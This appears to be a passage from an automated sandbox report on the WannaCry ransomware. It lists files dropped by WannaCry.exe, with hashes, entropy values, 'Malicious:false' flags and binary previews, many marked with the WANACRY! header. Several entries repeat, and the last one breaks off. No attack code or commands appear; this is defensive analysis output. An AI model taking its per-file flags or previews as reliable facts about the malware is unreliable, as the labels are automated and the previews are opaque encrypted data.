                                                                              SSDEEP:24:bk98Flb4U13NcDmD4sbRD31FS8Tdlj64YeDhPjEbmtUr/gsOeBAC:bk9C/9Ymz31FFd51hbiTrxtBN
                                                                              MD5:A6409D108DFA7BF0B64FABF6B1990A10
                                                                              SHA1:F0098B178D24A3A3BE43C674C3E17121973599A8
                                                                              SHA-256:E97C62ABB05DD78F01BB4603DCA92B179CD4738F7B65E16C2E2274EADA6022C6
                                                                              SHA-512:6CC52C5351A9AEBE6F851EF20A8677546F7FA0625C1753B126DD17DB7860EF270850355AA8E2B01A7219FC7BA59DDC26116650F4DDCDFE7738C73522B7021329
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'..b..l.+.-S.zS.2r0...on..... Z`E...=.\.DV.,+.....qpt.<.5.{...y......].6A.X..l.........}3H.71s..r0...".....;<o.....v....T+..+-.v...J.(...{$.,._....10->.O..T.P...,i..\/'.W.....?.0........U..Q6x..F.NQ...E..|.u.z.....u.@.Pr......4y....`..E.\}...X............t.../[.&.?TS.A\.]|f....5.+...'."...vc......w..u..6.zl.e..-.6.E...3..8ZV3...Me .C..,2eY..: @+.RZ...Q.K.....6..<@...e.inHh:........PX..v."z.s<.3d%.S.z..[S8!if,.;..C..y.dn...F7.^.oN..a..>..W....o^v>....%..Rm.9X.U.....~C.&..V..!XI........w.%....8.^..V..vVR.T..1>......<.l.n..d..@..l.s.Z.M.+/......W:..P...4L...]........Y...a.O>.:>WDc...u..p.'.rm.9.,..,.>.. ..4X.Y..M.@E...w.&....%T....7/.y.....<..._...+......S@..M...g.<%.......D......V.T.`.f..q.f.\6...<....{..5...6h~3...&...!.1.!.p..2Q}.(.w..d...._.7c....1...ow$c../.]gJZ.e..n.>..._.(.....?.$...!Q..............%w.{....U.*.O_....fy.b.c..z.8.]U...Ue....,.wi.......q.8qJa...#}..].5..Z"..+a..6.l.3q...wu..^...^h.;...|.Wg...&..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.84883560288963
                                                                              Encrypted:false
                                                                              SSDEEP:24:bk98Flb4U13NcDmD4sbRD31FS8Tdlj64YeDhPjEbmtUr/gsOeBAC:bk9C/9Ymz31FFd51hbiTrxtBN
                                                                              MD5:A6409D108DFA7BF0B64FABF6B1990A10
                                                                              SHA1:F0098B178D24A3A3BE43C674C3E17121973599A8
                                                                              SHA-256:E97C62ABB05DD78F01BB4603DCA92B179CD4738F7B65E16C2E2274EADA6022C6
                                                                              SHA-512:6CC52C5351A9AEBE6F851EF20A8677546F7FA0625C1753B126DD17DB7860EF270850355AA8E2B01A7219FC7BA59DDC26116650F4DDCDFE7738C73522B7021329
                                                                              Malicious:false
                                                                              Preview:WANACRY!....'..b..l.+.-S.zS.2r0...on..... Z`E...=.\.DV.,+.....qpt.<.5.{...y......].6A.X..l.........}3H.71s..r0...".....;<o.....v....T+..+-.v...J.(...{$.,._....10->.O..T.P...,i..\/'.W.....?.0........U..Q6x..F.NQ...E..|.u.z.....u.@.Pr......4y....`..E.\}...X............t.../[.&.?TS.A\.]|f....5.+...'."...vc......w..u..6.zl.e..-.6.E...3..8ZV3...Me .C..,2eY..: @+.RZ...Q.K.....6..<@...e.inHh:........PX..v."z.s<.3d%.S.z..[S8!if,.;..C..y.dn...F7.^.oN..a..>..W....o^v>....%..Rm.9X.U.....~C.&..V..!XI........w.%....8.^..V..vVR.T..1>......<.l.n..d..@..l.s.Z.M.+/......W:..P...4L...]........Y...a.O>.:>WDc...u..p.'.rm.9.,..,.>.. ..4X.Y..M.@E...w.&....%T....7/.y.....<..._...+......S@..M...g.<%.......D......V.T.`.f..q.f.\6...<....{..5...6h~3...&...!.1.!.p..2Q}.(.w..d...._.7c....1...ow$c../.]gJZ.e..n.>..._.(.....?.$...!Q..............%w.{....U.*.O_....fy.b.c..z.8.]U...Ue....,.wi.......q.8qJa...#}..].5..Z"..+a..6.l.3q...wu..^...^h.;...|.Wg...&..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.812678158521236
                                                                              Encrypted:false
                                                                              SSDEEP:24:EgrVXMP7K+ZnIkP9qznjVOacMmsKTN6iXhPoWNkJ5S:JrV27K+T9qgaCXfwS
                                                                              MD5:8BB170D8EB7AF0DFDC37348165396206
                                                                              SHA1:2569E3BFC9AA957234C5B058ECE53BDCFC4F9E2B
                                                                              SHA-256:4388CE57EADE3CDAE8DCA17A46F109C5B3B4EAACE78A33E391BDEA3C9034F872
                                                                              SHA-512:5FED2BA12158D04FCFAED4E4A458B2BB427331D14C08408DB7720A2E925DC09270010DDD033B45AABE59686EA8E201F8C2B5D919E6C9AEF42FD09FC21E52B0A5
                                                                              Malicious:false
                                                                              Preview:H..m:.Y..D....@..m..|.bl"o6....v...0j..>a[.....L..Ou.`...E.wx.w.r..VR#.*N......IW.6@{knv....0...nj....}%'/.Pt....L.)..D.V.../..W.........;t...3........O........V.b..<..$..h).....!....5........'...R..r.......Y....mV~Lj..h\d..4?.I=.K]...#.<..h.9K..3V.{.......}.. .x....v.i.X...i.XQ.$.....e5..Op...%#..G.ep.X.._......Z.*...9on........_.*.;......z..<E5E../S8...~..O-..&.?..-*..w}..C.=.....R..2....W.[..{..z..&...9..y...Xi....[.l....."/.t.}.y..\.bOzX..:."..{al..n.|..../n.1.......`.#a..y.6..k.HI.......7....OSe.8..9)%.Y.%GM..N<.r...5.cn^.c./:.(D..*.<P.#..[..._..UH.........#.eT...^....P.<.O,.zI,...&.f.....L..%k.....,..%........<........,.@.zC.<q...7...-....k....,.K.".-B...Co...$q.m..W..$.f..:w.%/....H.$B.v.......bWJ...T,.~d.........ei0..gQ........02...W.$~x\.3..0...>(-..6v5.>.e....nc...,.4....~]$.3..`A)MwQ.lN|nB}fL..I..$..?p.W.....\.....3.=D.;A.h'9q.Y.>HK..ZD....;/.....[M3n~..j...]..P.l1.1...D.2.......m.i..z)..;.r.....1.=+/??Tf.E.B.egh...-$.].....`
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8502163155199645
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkSxnv4OvjT6OgjSrmpcvCIL4G+MMS2IC/LVfTnzRHbyFOf10cl39VkkQdhYrfz:bkKQejT7USicvCjG+MMvJZ7z55Dd9Vk0
                                                                              MD5:7D687A423FFCC51E8BFB815CCB1F93F6
                                                                              SHA1:264A9A4443B60C1F914285467AEC383BA7DEF8B3
                                                                              SHA-256:6193907C764E7D2EA96066EF2AB9D8D84BA2E6775B03317C14F9357561639C6E
                                                                              SHA-512:8610FC1AEE67F5BB95648742F5407C1DA6FF317F800888DD699AF7738E75875D01D3FCA42B3129ABFF88A55612F99487FCA3C4A4CD6A34F10E9DB6D8BC4F205D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....S......;A.~..Z..o..,.....`.+.w.n..:......Za............t.}.Cmn........Q<.f.u.G..UsW.jJ._../.....a).8?.........%..F.".....!.....+.{Ka....`...)B..[.3....8..0.0..\N.s;R.&9....c.n.P.xtp.....kis<.{..%&):V7...v......>\.c...=...JV...s..^..*$.....I.............<.?..J.az9.jvx....E.(.iK}.....!^$.O.W....x.HtR.#..0.q...C...5.x.`.X..q...b..2e....@........K..j.V.e..Im,iM.T...i.j..s..yS......4....~..I.I4\..fA....i.<....d..G..dr...l..aQ..U.,..N....->ud........e..h.!......0Y...L..]z,....J0.?..$%.1u...Fk........a.Q/.A...>p.e.4)./.....W........Z..V...0.....+>...qs..W....9.uJ.q....7E...x`,l..i...w#...9M..\.T.W.5.\....G..9#.....i@....r..f.....k._.Z.=......\Kw.M.....f.....B.%a...Q*..k...+...r.5...p=%6.5Ij"x<W.K...md{.OP.At....,w......8...".h..5r*...0....;.2.GC5.Y."..Do..)..*..".g/...i(...%....(...S.N#.U...Vl..N=..p..2U..0.|..9T..T..P.w.........,76..`..Q..5...s.U.9.a..).......4...|.A...y.fq.C.x.8..8.......E.AJr.b...6..i/...4p.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8502163155199645
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkSxnv4OvjT6OgjSrmpcvCIL4G+MMS2IC/LVfTnzRHbyFOf10cl39VkkQdhYrfz:bkKQejT7USicvCjG+MMvJZ7z55Dd9Vk0
                                                                              MD5:7D687A423FFCC51E8BFB815CCB1F93F6
                                                                              SHA1:264A9A4443B60C1F914285467AEC383BA7DEF8B3
                                                                              SHA-256:6193907C764E7D2EA96066EF2AB9D8D84BA2E6775B03317C14F9357561639C6E
                                                                              SHA-512:8610FC1AEE67F5BB95648742F5407C1DA6FF317F800888DD699AF7738E75875D01D3FCA42B3129ABFF88A55612F99487FCA3C4A4CD6A34F10E9DB6D8BC4F205D
                                                                              Malicious:false
                                                                              Preview:WANACRY!....S......;A.~..Z..o..,.....`.+.w.n..:......Za............t.}.Cmn........Q<.f.u.G..UsW.jJ._../.....a).8?.........%..F.".....!.....+.{Ka....`...)B..[.3....8..0.0..\N.s;R.&9....c.n.P.xtp.....kis<.{..%&):V7...v......>\.c...=...JV...s..^..*$.....I.............<.?..J.az9.jvx....E.(.iK}.....!^$.O.W....x.HtR.#..0.q...C...5.x.`.X..q...b..2e....@........K..j.V.e..Im,iM.T...i.j..s..yS......4....~..I.I4\..fA....i.<....d..G..dr...l..aQ..U.,..N....->ud........e..h.!......0Y...L..]z,....J0.?..$%.1u...Fk........a.Q/.A...>p.e.4)./.....W........Z..V...0.....+>...qs..W....9.uJ.q....7E...x`,l..i...w#...9M..\.T.W.5.\....G..9#.....i@....r..f.....k._.Z.=......\Kw.M.....f.....B.%a...Q*..k...+...r.5...p=%6.5Ij"x<W.K...md{.OP.At....,w......8...".h..5r*...0....;.2.GC5.Y."..Do..)..*..".g/...i(...%....(...S.N#.U...Vl..N=..p..2U..0.|..9T..T..P.w.........,76..`..Q..5...s.U.9.a..).......4...|.A...y.fq.C.x.8..8.......E.AJr.b...6..i/...4p.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.823714148704198
                                                                              Encrypted:false
                                                                              SSDEEP:24:dr53Vi2M3CmNZ0Xaqiz0VUGW77Bd2OL6FKeakcDRpQmac+7:x/M3Vqiz02RfbfZe6RR+
                                                                              MD5:3AA6FA464B3B1989C0BEF2D4E4884135
                                                                              SHA1:32530D7371C14B723435291F2E6AFFA0B7E2AFFC
                                                                              SHA-256:936EB387C151569BDB9EB10C19464275242E23EBEF65700A57CAD28E676F0C15
                                                                              SHA-512:7ED3B772100085A5BBFA3397BC20906D0DB938A8791BCD685F7C080F34BD7D31C5CABDEE3C320F7EBD520C94CE5DA9844AE496A5696DD92A5DDD27EFC5ED0BA3
                                                                              Malicious:false
                                                                              Preview:..o..kg._......gi...7...$$..B)...`...........p.4.....e...u.xG8.h........3`e..i:V........P.... #..[.../...<....'.U.....j.b...HJ.h.<.+.......Q."o-%,........]..{`.../...?d...l.(.(5..Wn......Woj:_2$0.&tqq.v.8PW...?...Y}+d?..c.n9...p....Z./4...~._m2IA.9A....e..;xv..._......p.....r./.A_....ep.)W"..R}s....!AL..J.P9..~.e&.G..Q<.h...S.(..3b....-...X.9.......OI(F~..QG....b>..c..=...l.Q*M...z.%`.[.&.|.#.....@VWA....<...cA..j#$&.....8o....0.......u..f.K.W1x.%.]At.K.3M.t....x......TC.G..&.D.u......)....6..s./.:.....Q...0....!..w...D8..Y....X.Q$q_'n.R..zM. .Y.p.m..u.d../.:..!...:_#O?ZB=..9......O.?!...........O.....W.Vc...<wd..w}%@)...h........&.....}Wj`p..I-..........S'.}./.5.........n..GL.........5T.sXf.a..E...<.............8H....F.\4.mR......2..p.S.`........L..&4.4..#.....f]...E%.r.Sk1oy..V...?.N..`....:.T.....XNH..R...Q(.B.a..h..Y0.,..!@..oR,3....[...~.Y..3]Dy....W66.Gg.:"_.....#r....d..3q.]).<......76*.u.1.2!hG`..1J.#e...g.F.x.0.........EC-O.{g.
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.843161924123368
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNs4fnuGna08ZsgU+jDWKYLXv12o2wCqhFm3lm9jFcz3/f2vu26xdi80Hn6:bkM302sN+jKhX/m3E56zvf6u26Di8+n6
                                                                              MD5:DCC9C0D3F21B106F379BA35E2042F751
                                                                              SHA1:03824AFADF7A9C99EEDFD5CD37C136DD55830E33
                                                                              SHA-256:BEA90947A032FDF5C887EA731A8DF342366CCF8C8025BE7ED0BC4D4D61C50929
                                                                              SHA-512:EF2DE83046BDCD66CE40A9DC549B8063594B3D04D803DA256825E0B82A8576C8EE1FCBA66CA6074E885857B2318891DFCD52D079EFD3CC594681BA47199E13F5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....#'W.>hg......b0..5.BA..M...8.....:p.......>f......r.k..A,....u...XJ.X[W....O!.Dj7.....l...... AT..z.f...<X.Y........h.............cswH..'G).a.c....Z.@.>..S...B...'.5.G...N.......F.(VU..U..O..n..E...+..O..L.R..}..S..#..A.y..h........b.ymD..............^.].PG..t3.!b..~j.#.".O..w.P|..Y...:.r...5.i.q..Z.. ~.....0.|....f.nf .bn.........Vv...}v..01..fs..`.M0........>Y..r."vjz.3..E.R.l7....Q.EQ....R....9}..+.]-z.....lK../N.J.5#.o.O..\d.....zM.b,;..@..T..._\O}.....b..qP...S.4W.P..]P..M:.V.M0..jQ.....v....2...?...>..o...:Q*.Z...Tu...........S24z..5.NXb(J.wB..r.Z~.B.Z...)......1H...hX]`...F...dI....g.I.5.=..l.e%X.-+..7..b..U.r...?. U^..r.=1..(+.7.....i...\.4.H.8p..........C..(.}A`Fh.K..7.?.....Dv.A.s5... .}"..?.-L.$....).1.J.X.5..o.0...3y..v.#.P$Fj.3.b..C.Y.4..\.RO......R....S.e@s9W.....'+.0.9....4.......)K3...]..T|.M...R..}=.9!.\.Py..K.i....z...>n...}~....NR8........|..|..4%`|ne. ..a....f.....h.........R.?...@..1.~6..T....(N.V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.843161924123368
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkNs4fnuGna08ZsgU+jDWKYLXv12o2wCqhFm3lm9jFcz3/f2vu26xdi80Hn6:bkM302sN+jKhX/m3E56zvf6u26Di8+n6
                                                                              MD5:DCC9C0D3F21B106F379BA35E2042F751
                                                                              SHA1:03824AFADF7A9C99EEDFD5CD37C136DD55830E33
                                                                              SHA-256:BEA90947A032FDF5C887EA731A8DF342366CCF8C8025BE7ED0BC4D4D61C50929
                                                                              SHA-512:EF2DE83046BDCD66CE40A9DC549B8063594B3D04D803DA256825E0B82A8576C8EE1FCBA66CA6074E885857B2318891DFCD52D079EFD3CC594681BA47199E13F5
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....#'W.>hg......b0..5.BA..M...8.....:p.......>f......r.k..A,....u...XJ.X[W....O!.Dj7.....l...... AT..z.f...<X.Y........h.............cswH..'G).a.c....Z.@.>..S...B...'.5.G...N.......F.(VU..U..O..n..E...+..O..L.R..}..S..#..A.y..h........b.ymD..............^.].PG..t3.!b..~j.#.".O..w.P|..Y...:.r...5.i.q..Z.. ~.....0.|....f.nf .bn.........Vv...}v..01..fs..`.M0........>Y..r."vjz.3..E.R.l7....Q.EQ....R....9}..+.]-z.....lK../N.J.5#.o.O..\d.....zM.b,;..@..T..._\O}.....b..qP...S.4W.P..]P..M:.V.M0..jQ.....v....2...?...>..o...:Q*.Z...Tu...........S24z..5.NXb(J.wB..r.Z~.B.Z...)......1H...hX]`...F...dI....g.I.5.=..l.e%X.-+..7..b..U.r...?. U^..r.=1..(+.7.....i...\.4.H.8p..........C..(.}A`Fh.K..7.?.....Dv.A.s5... .}"..?.-L.$....).1.J.X.5..o.0...3y..v.#.P$Fj.3.b..C.Y.4..\.RO......R....S.e@s9W.....'+.0.9....4.......)K3...]..T|.M...R..}=.9!.\.Py..K.i....z...>n...}~....NR8........|..|..4%`|ne. ..a....f.....h.........R.?...@..1.~6..T....(N.V
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.801229453987464
                                                                              Encrypted:false
                                                                              SSDEEP:24:xztYtoSM8q9lzkGNS9lznrVXJMg3vSQ6z3tdO9b+bUTLsjNsmIVLgMYq:xxdxHgGwvnrVXJpfb6z3tdOT2IFvH
                                                                              MD5:5BCE62736E564FE9C33DC10D35828571
                                                                              SHA1:7A44DABB28DC44A270981A25FAEA8DE26332A83C
                                                                              SHA-256:E4BB1D8788D2DD6B9165CF422C737449BB142B35ADDCEF65D10A857CB921E056
                                                                              SHA-512:E126AEF1A679F7FBFE18582A76C8208D41C27B4C670CCFCA6DC095C3CD95F6C290C46C6E8BC3D516777FB7BFF220C6D19D932A0904C4B1601A6DF8C4EED7FB0A
                                                                              Malicious:false
                                                                              Preview:..{.I.q...n.A..F..C.[Lv.`TQ`^.MMS?.D.'.. ...."i.Z..Z..j*..9hy.Gs]r.!.4A..3..../.t.........EQ:tk.L..J?Q&.T..K-..{YN.~!.FS&}..j.b.......E...`}g...lO.(S.......qH..K..n{u).!..O..5..5.NQ.S.vHVr.lp...[.<.....74.c....K....X.."...2.~..b!....N.BD.07...c.|./.`_.f.......U ..M|.|t0.._Bm>s...)...A..t.>...ib.QR $.......\#3H.".W.6....`.3.Y._.W. ..K..`....o....dJ.3=..J..e.T.y.#+....+R<@...X>..e4T<.....z#+...Z.._....w.-..;%........Cm$-....y|.G..nb....O6.}..fr.}..L@.&.eN...!.z}..5...Q....-...M..6....P.I..N.ZT.^.....<G...R'..2..3.......Y..J..l.]..VF.uB..U...(.."..E0K..EI]....AJ...8...d......].X:p.B...h...........5!...'.5.e......A.].T.u=.Y..>...9/ .....$5]:.w6.....p..V[...T?.*...Z..I....%..?.Nd.K!...u1.c....&.T..]...-.Y...I....<.o@.........t3...$"..<$r.z=.A.{r.1.~|.=d.J_....=..../..JM8...nG.S.......8.8....;P:.Ib.CrJc.... C.)..J?cV........U......}.Lu.....#...:..o.....m..........,...i.r......#.{.au^...o.~|...x... .@.B.K..m:...M?;R/}..}7..J.1=.....S$ou....J....(..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.851749492015445
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkHU4TUMIoeVzZfxWLr1LiyVz8FU/iDJ7d8vpjvi9W589NB2YElgj3L:bk0uwoe1YDQFUKlow9IGyzlgv
                                                                              MD5:3129630F6B18C4ADC8E9686E69A58698
                                                                              SHA1:10699CC41AE37956CF12C98D3BB74F1C19BA32CF
                                                                              SHA-256:017CE65D72BFB67A0BCF359260E0A77E70DC82B400DD181DD683DA60C70F68DE
                                                                              SHA-512:404F4E39631C3FA5C8614408CEE32EE0D9E3ED397A170D1DC9FAF6F944E3F99F8ADD75084D1ED842C2726BEBBFD25575D1CCB99D4BBD7ECDD28C5287B748E139
                                                                              Malicious:false
                                                                              Preview:WANACRY!......t..2...UU.K"N.J!.f..b........oX...S>.X...-~...&*.z.......y....lP8Y].b.Q.A.|zz?m%..+.2.y...).a....m~;..-b.......NvS{A-.....@.<Y.|1.l.=.b.E..d.#W.wp....&........H..Z8c]..9E4..}p.$.zggM...Ws.&.B...p.Z.$.g...j.....Pw.)..I..x...(Y..P...'~.'..T.8.a............%s@.....f....G..|.E.|N...p.....l#+...+..w...RG...^...D.......(..K0!?Xi.d|.C..Lc.E;.N.a:..-.Y,I2.KY.E.I..N.....3...R.^I.@..K.Bhv<....\......jr.."%-.H.9.....B.%yK=...............7......(.z..0q.4i.=..[.$|<9........*..*n.i.i|..+(.l..Y&... ...E...?....4!et.1......R...`5.6,.-..B......D9...*A.....s.8..{hP..U3.-...~.j....@........>.....j...d.I....n..|...y..+...*;z.......}9.El.....}=H.....a.'.uSe...F..j.....1T.+........,M...!..2.E`.U....{..i7pF...)....W..U..-.....P.@.0...c...?...a...k....qkx.e..D9'{......|'.f.$o.......x.....`J.u..n..= .SF.....>:{X....#..S>j..z...mlsT..`.I.!.>..j..<..>.l.s....;...-..Z.....o(.\....3..........5.\.Z,C-.U|... ..Yn.?3_.6.=o..#.y.zE".}....A...O....U...V...[..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.851749492015445
                                                                              Encrypted:false
                                                                              SSDEEP:24:bkHU4TUMIoeVzZfxWLr1LiyVz8FU/iDJ7d8vpjvi9W589NB2YElgj3L:bk0uwoe1YDQFUKlow9IGyzlgv
                                                                              MD5:3129630F6B18C4ADC8E9686E69A58698
                                                                              SHA1:10699CC41AE37956CF12C98D3BB74F1C19BA32CF
                                                                              SHA-256:017CE65D72BFB67A0BCF359260E0A77E70DC82B400DD181DD683DA60C70F68DE
                                                                              SHA-512:404F4E39631C3FA5C8614408CEE32EE0D9E3ED397A170D1DC9FAF6F944E3F99F8ADD75084D1ED842C2726BEBBFD25575D1CCB99D4BBD7ECDD28C5287B748E139
                                                                              Malicious:false
                                                                              Preview:WANACRY!......t..2...UU.K"N.J!.f..b........oX...S>.X...-~...&*.z.......y....lP8Y].b.Q.A.|zz?m%..+.2.y...).a....m~;..-b.......NvS{A-.....@.<Y.|1.l.=.b.E..d.#W.wp....&........H..Z8c]..9E4..}p.$.zggM...Ws.&.B...p.Z.$.g...j.....Pw.)..I..x...(Y..P...'~.'..T.8.a............%s@.....f....G..|.E.|N...p.....l#+...+..w...RG...^...D.......(..K0!?Xi.d|.C..Lc.E;.N.a:..-.Y,I2.KY.E.I..N.....3...R.^I.@..K.Bhv<....\......jr.."%-.H.9.....B.%yK=...............7......(.z..0q.4i.=..[.$|<9........*..*n.i.i|..+(.l..Y&... ...E...?....4!et.1......R...`5.6,.-..B......D9...*A.....s.8..{hP..U3.-...~.j....@........>.....j...d.I....n..|...y..+...*;z.......}9.El.....}=H.....a.'.uSe...F..j.....1T.+........,M...!..2.E`.U....{..i7pF...)....W..U..-.....P.@.0...c...?...a...k....qkx.e..D9'{......|'.f.$o.......x.....`J.u..n..= .SF.....>:{X....#..S>j..z...mlsT..`.I.!.>..j..<..>.l.s....;...-..Z.....o(.\....3..........5.\.Z,C-.U|... ..Yn.?3_.6.=o..#.y.zE".}....A...O....U...V...[..
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.802930386357319
                                                                              Encrypted:false
                                                                              SSDEEP:24:Iho4D5FlrzYpMRao3ltuAaukuExf5j01th9fZE3XvdJo+Wb6hf0:IhxzYplo3/PbgREuXFQ6m
                                                                              MD5:80206B11AABC461CCC950FA48ABEFDCA
                                                                              SHA1:D569553844047437E3DDF98B77BF948D9BC3059F
                                                                              SHA-256:95905E6FFB11508C6640D73F89361D7BA5392A979B66ABC05D1BFA706F101208
                                                                              SHA-512:351CD1EC14EBEE225E4C3A058343E0769A05809EBA2658BC55FD991E40DE0B5B499937B198274F06768AB062055FFEEDF287E7F088959D5270C4AABA67FA9DAC
                                                                              Malicious:false
                                                                              Preview:c:.G...j.....x.]lM.C.e...1g.O!q_Ru..d.....h..iwS.)......j}1.'e.5o{..r..DK..lg.`..xN.....6q.:..u..E....8.ak].}...j..1L.x...=.y.".. w!.6.NE..q.].].Q..byB.U.`...`./..U....F,sG9.#f..q....t.$.$oy..........E.E|.._BL!.t&....}.e.[..b._...J...?.M.Yw...!|...)z..r._..wc&......<[.P..3.<l...2EY...ph^.t.$...#.0...fM.0.N0\....3.^v...C....*....qE...YH..K.(.f..4=..%1..z.Ow..9...{ .....d*.7...]....dk..e...a'^..[w;P......$.{.....<..'...s..a..[...%h...J....!-.....^.=KS]3i..Y..>..wV....Hb...>Oy....#&.pk.J.0.e.} .1.;/....E.^.n.f.......$I.o..t[.oo<.]..v.]..3.\.]..q...v.....>vPm.........e.R.6.1.........6....I..|z....a`.d'...)^{X%\&...,..T.P*.a..`........|......[.m....3.......M$..p.....N..zGk."t.J.-.......B8'R.?..r.....6,F...6.H.>...%.Q?U`.8..MB..im[...%.. ..H...[X2..3.m....W.G...E`8.a].{X;.ThS.B......&......]l...)..&hU-G..~.0o..[. :..{.y.]qY(....8..%........{LR..5M....R...2..M.J...=.,PvX.......2..cY*.....L..U(:XR..~z..P%0..lH.@e....*..g..^^...|..../...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8313107969489515
                                                                              Encrypted:false
                                                                              SSDEEP:24:bknUSokxhaEXamjldu7sE9a1joD5wmocdVV5WbwrtJZXKYAJlFSsXM8pKbI:bknUinj6MGrV8MpJZXKDN8k
                                                                              MD5:D83D58C93B7CC1A69D43B431D16B3BBB
                                                                              SHA1:F65EBAAB91FE09DC9DFBEF4B30637C6592D3C3A8
                                                                              SHA-256:96F4C7AEEFF57A04D2998729E8C269FD95F09A956167143247E78D2ADBAD1026
                                                                              SHA-512:FDD2479D07BEC24C2813EA435B7D0C5B08C780EC11E213A5B49E9B607E575443D6AD1CBAA3B94D27EC11DC4FC233CB645E66ED2E116A646AD4C71EAF15AA23F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....la.b.5>.\..E..`.3epOg.......qgwtOP.o.e.k.n..8...vq...+H..U..r.lK.....<h...<..`.Vh|$G.r.\I.c....X..s..?.....k..I.!...'iP.z.]y$D...S6..E#.J.a...#CM........e'.K.Vk....k..."^.vg..)K.RN.K.fx...x]..f.... .....1.S...G`.bw.5I..H.e#..)g.S..%..r...............1..unI,...I.W.....u?..-..8.........V*.Z..s.r....,$.:..C..QN...'U..[..f:z...'Q,@...%f..@.G.....8{aGL....ePh0.7.....4@.f....G......\Y|..|.....M%.n1N...h...n4.....!^.zIV.......2#.CZ......X..6.1...y0.%2.s.My.a....t*.jn..f....|.CSr....-.........bl....Y]Q..o.R..l...p.x.f....{....lx...i.iS~...........O0;..%..%.....{!R1i%n..n.A.."......R,)G.;..jM..wf..UX.tiR.h...F/{.m..#S....US2.%ka.]....8...h...67.*iH..U.k..gr.....rI.D.vz ..ms0J.`..........k.3..B.|..r..2x.........z........#.....W-r..fT...#...D.....;rY12.a.A.J1;..T.^,l..=6e.K...'}8.._...1f.'.!...2.. f...C.#...|:.w.M....J...9.....`B.R.I.0...Si.....k..hw.y.m..`..4.H^...0.(....~D.....2....t..Y.y.,..!..!*...[.?.".*K.b...bZ..G%.3.Q...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1320
                                                                              Entropy (8bit):7.8313107969489515
                                                                              Encrypted:false
                                                                              SSDEEP:24:bknUSokxhaEXamjldu7sE9a1joD5wmocdVV5WbwrtJZXKYAJlFSsXM8pKbI:bknUinj6MGrV8MpJZXKDN8k
                                                                              MD5:D83D58C93B7CC1A69D43B431D16B3BBB
                                                                              SHA1:F65EBAAB91FE09DC9DFBEF4B30637C6592D3C3A8
                                                                              SHA-256:96F4C7AEEFF57A04D2998729E8C269FD95F09A956167143247E78D2ADBAD1026
                                                                              SHA-512:FDD2479D07BEC24C2813EA435B7D0C5B08C780EC11E213A5B49E9B607E575443D6AD1CBAA3B94D27EC11DC4FC233CB645E66ED2E116A646AD4C71EAF15AA23F9
                                                                              Malicious:false
                                                                              Preview:WANACRY!.....la.b.5>.\..E..`.3epOg.......qgwtOP.o.e.k.n..8...vq...+H..U..r.lK.....<h...<..`.Vh|$G.r.\I.c....X..s..?.....k..I.!...'iP.z.]y$D...S6..E#.J.a...#CM........e'.K.Vk....k..."^.vg..)K.RN.K.fx...x]..f.... .....1.S...G`.bw.5I..H.e#..)g.S..%..r...............1..unI,...I.W.....u?..-..8.........V*.Z..s.r....,$.:..C..QN...'U..[..f:z...'Q,@...%f..@.G.....8{aGL....ePh0.7.....4@.f....G......\Y|..|.....M%.n1N...h...n4.....!^.zIV.......2#.CZ......X..6.1...y0.%2.s.My.a....t*.jn..f....|.CSr....-.........bl....Y]Q..o.R..l...p.x.f....{....lx...i.iS~...........O0;..%..%.....{!R1i%n..n.A.."......R,)G.;..jM..wf..UX.tiR.h...F/{.m..#S....US2.%ka.]....8...h...67.*iH..U.k..gr.....rI.D.vz ..ms0J.`..........k.3..B.|..r..2x.........z........#.....W-r..fT...#...D.....;rY12.a.A.J1;..T.^,l..=6e.K...'}8.._...1f.'.!...2.. f...C.#...|:.w.M....J...9.....`B.R.I.0...Si.....k..hw.y.m..`..4.H^...0.(....~D.....2....t..Y.y.,..!..!*...[.?.".*K.b...bZ..G%.3.Q...
                                                                              Process:C:\Users\user\Desktop\WannaCry.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):1026
                                                                              Entropy (8bit):7.789997774915101
                                                                              Encrypted:false
